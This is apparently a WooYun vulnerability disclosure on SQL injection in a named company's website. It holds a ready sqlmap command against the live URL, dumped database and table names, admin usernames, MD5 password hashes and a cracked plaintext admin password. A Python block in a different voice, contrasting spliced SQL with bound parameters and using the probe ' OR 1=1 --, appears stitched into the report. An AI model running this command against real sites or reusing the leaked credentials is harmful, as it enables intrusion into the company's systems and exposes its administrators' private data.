WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------------------- http://drop.zone.ci/
2015-09-07: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed.
2015-10-22: The vendor has chosen to ignore the vulnerability; details disclosed to the public.
Sanrenxing Media Network Technology Co., Ltd. / administrator account password already exposed
Injection: sqlmap.py -u "http://www.topsrx.com/index.php?m=default&c=page&a=detail&name=Company%20Profile" --dbs
Dumped data proving the impact is real:
available databases [12]:
[*] db_hellouniversity
[*] db_topsrx
[*] information_schema
[*] manage
[*] mysql
[*] openfire
[*] smartcollege
[*] smartcollege_gsh
[*] smartcollege_qz
[*] test
[*] vote
[*] webmanage

Database: db_topsrx
[13 tables]
+---------------+
| srx_admin     |
| srx_category  |
| srx_file      |
| srx_guestbook |
| srx_job       |
| srx_link      |
| srx_mod       |
| srx_nav       |
| srx_news      |
| srx_page      |
| srx_product   |
| srx_setting   |
| srx_show      |
+---------------+

Database: db_topsrx
Table: srx_admin
[7 columns]
+---------------+------------------+
| Column        | Type             |
+---------------+------------------+
| id            | int(3) unsigned  |
| ipaddress     | varchar(30)      |
| lastlogintime | int(10) unsigned |
| logincount    | int(6) unsigned  |
| password      | varchar(32)      |
| roleid        | int(1) unsigned  |
| username      | varchar(50)      |
+---------------+------------------+

Database: db_topsrx
Table: srx_admin
[2 entries]
+----------+
| username |
+----------+
| admin    |
| yuxang   |
+----------+

Database: db_topsrx
Table: srx_admin
[2 entries]
+----------------------------------+
| password                         |
+----------------------------------+
| 36df336a9a11768d3a835c99a0c84d49 |   (plaintext: 661699)
| e2c4496d6bcec25cca46e129b506f468 |
+----------------------------------+
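The dump above is possible because the `name` request parameter reaches the database as part of the SQL text. The following is an added illustration, not code from the report or from the affected site (whose source is not shown); the `pages` table, its rows and the two lookup functions are constructed for the example. It contrasts the string-splicing pattern that lets a crafted value rewrite the query with a bound-parameter version in which the same value is only ever data.

```python
import sqlite3

# Constructed sample rows standing in for a CMS page table (assumption: the report
# does not show the application's schema, so this table is invented for illustration).
PAGES = [
    ("Company Profile", "public"),
    ("Contact", "public"),
    ("Internal Notes", "private"),
]


def make_db():
    """Build an in-memory database holding the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (name TEXT, visibility TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)", PAGES)
    return conn


def lookup_unsafe(conn, name):
    """Vulnerable pattern: the request value is spliced into the SQL text, so the
    database parser cannot distinguish user data from query syntax."""
    sql = f"SELECT name FROM pages WHERE name = '{name}' AND visibility = 'public'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, name):
    """Hardened pattern: the request value travels as a bound parameter and is
    never parsed as SQL, so it can only match (or fail to match) a name."""
    sql = "SELECT name FROM pages WHERE name = ? AND visibility = 'public'"
    return [row[0] for row in conn.execute(sql, (name,))]


if __name__ == "__main__":
    db = make_db()
    # A benign value behaves identically in both variants.
    print(lookup_unsafe(db, "Company Profile"), lookup_safe(db, "Company Profile"))
    # A tampered value of the kind automated scanners send: the unsafe variant
    # lets it comment out the visibility filter, the safe variant just finds nothing.
    probe = "' OR 1=1 --"
    print(lookup_unsafe(db, probe), lookup_safe(db, probe))
```

Parameter binding is the fix the vendor never applied here; it also makes a scanner like the one used in the report produce nothing but "no match" responses, which is the easiest kind of probe to spot in access logs.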
admin's password is 661699~~ and yet I never managed to find the admin panel....
In summary:
You know the rest.
Could not reach the vendor, or the vendor actively refused.